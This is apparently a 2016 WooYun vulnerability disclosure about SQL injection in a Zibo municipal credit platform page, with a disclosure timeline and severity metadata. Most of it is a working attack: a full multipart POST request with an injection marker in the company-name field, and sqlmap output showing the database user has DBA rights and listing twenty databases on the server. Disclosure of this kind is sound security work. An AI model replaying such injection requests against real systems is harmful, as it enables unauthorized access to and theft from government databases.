2016-05-18: Details reported to the vendor; awaiting vendor response
2016-05-23: Vendor chose to ignore the vulnerability; details disclosed to the public
Entry point:
**.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx
Online service hall:
**.**.**.**/ZiboHuiYuanShenBao/
POST request:
POST /CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx
X-Forwarded-For: 1..
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------172172203313378
Content-Length: 5589

-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTTARGET"

-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTARGUMENT"

-----------------------------172172203313378
Content-Disposition: form-data; name="__VIEWSTATE"

[__VIEWSTATE value omitted]
-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTVALIDATION"

/wEWCwK1voO+CQK4qt/MCQKplrXzCAKplrHzCAL3xK/fDALSzZfeDAKQmb6wCQLTjv3WAQLTjpG7CQLTjqWADgLTjrnlB1yIj+lapfWeTDgHzAPAK0VrHosQ
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$txtDanweiName"

ABCD1*
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$CBCorp$0"

on
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$btnOK"

??????′¢
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$dtbPingJiaDate"

-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$yearDrop"

2015
-----------------------------172172203313378--
DBA privileges:
[02:34:12] [INFO] testing Microsoft SQL Server
[02:34:12] [INFO] confirming Microsoft SQL Server
[02:34:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[02:34:14] [INFO] testing if current user is DBA
current user is DBA: True
[02:34:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[02:34:14] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\**.**.**.**'
20 databases:
available databases [20]:
[*] ArcGisSDE
[*] dxgxzz
[*] EpointFrame8_Monitor
[*] EpointFrame_ZBJS
[*] EpointNetoffice
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] rmgyzz
[*] sde
[*] stzxzz
[*] szhwzz
[*] tempdb
[*] yljzz
[*] ZiBoDaJianGuan
[*] ZiBoDJG_EpointSystemSupport
[*] ZiBoDJG_XZSP
[*] ZiBoZJZ
Separate? Filter.
Severity: No impact (ignored by vendor)
Ignored at: 2016-05-23 13:00
Vulnerability Rank: 8 (WooYun rating)
None yet